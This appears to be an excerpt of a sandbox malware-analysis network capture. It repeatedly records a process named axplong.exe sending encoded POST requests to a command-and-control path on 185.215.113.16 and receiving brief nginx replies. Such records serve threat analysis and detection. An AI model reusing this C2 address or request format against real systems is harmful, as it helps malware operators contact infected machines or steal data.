                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    9192.168.2.749713185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:02:44.258765936 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:45.010471106 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:45.011152983 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:45.285676956 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    10192.168.2.749714185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:02:45.402669907 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:46.154237032 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:46.154984951 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:46.403369904 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    11192.168.2.749715185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:02:46.524625063 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:47.281588078 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:47.282552958 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:47.532128096 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    12192.168.2.749716185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:02:47.652462006 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:48.402504921 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:48 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:48.403135061 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:48.655883074 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:48 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    13192.168.2.749717185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:02:48.778496981 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:49.623302937 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:49.661458969 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:49.961575031 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    14192.168.2.749718185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:02:50.086934090 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:50.846751928 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:50.849395037 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:51.127945900 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    15192.168.2.749719185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:02:51.243587017 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:52.146954060 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:52.152183056 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:52.403475046 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    16192.168.2.749720185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:02:52.656507015 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:53.470457077 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:53.471230984 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:53.723408937 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    17192.168.2.749721185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:02:53.837369919 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:54.591595888 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:54.592535019 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:54.841486931 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    18192.168.2.749722185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:02:54.963391066 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:55.781362057 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:55.782612085 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:56.039480925 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    19192.168.2.749723185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:02:56.153074980 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:56.905339956 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:56.906295061 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:57.150305986 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    20192.168.2.749724185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:02:57.259552002 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:58.026078939 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:58.027307034 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
